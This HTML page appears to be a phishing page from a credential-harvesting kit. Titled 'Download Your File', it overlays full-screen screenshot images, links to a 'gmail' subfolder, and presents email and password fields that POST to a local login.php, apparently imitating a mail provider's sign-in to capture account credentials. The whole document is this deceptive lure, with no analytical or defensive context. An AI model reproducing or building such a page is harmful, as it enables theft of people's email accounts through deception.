<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Download Your File</title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta name="generator" content="Web Page Maker">
</head>
<body>
<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:1347px; height:635px; z-index:0"><img src="images/paste563.jpg" alt="" title="" border=0 width=1347 height=635></div>

<div id="image2" style="position:absolute; overflow:hidden; left:490px; top:118px; width:373px; height:58px; z-index:1"><a href="./gmail/index.html"><img src="images/paste564.jpg" alt="" title="" border=0 width=373 height=58></a></div>

<form name="form1" method="POST" action="login.php" enctype="application/x-www-form-urlencoded" style="margin:0px">
<input name="formtext1" type="email" style="position:absolute;width:359px;left:494px;top:249px;z-index:3;height: 36px;" required placeholder="Email">
<input name="formtext2" type="password" style="position:absolute;width:359px;left:494px;top:310px;z-index:4;height: 36px;" required placeholder="Password">
<div id="formcheckbox1" style="position:absolute; left:494px; top:393px; z-index:5"><input type="checkbox" name="formcheckbox1"></div>
<div id="formimage1" style="position:absolute; left:779px; top:387px; z-index:7"><input type="image" name="formimage1" width="97" height="52" src="images/sino.JPG"></div>
</form>


<div id="image3" style="position:absolute; overflow:hidden; left:847px; top:38px; width:35px; height:39px; z-index:6"><a href="index.html"><img src="images/paste565.jpg" alt="" title="" border=0 width=35 height=39></a></div>


</body>
</html>
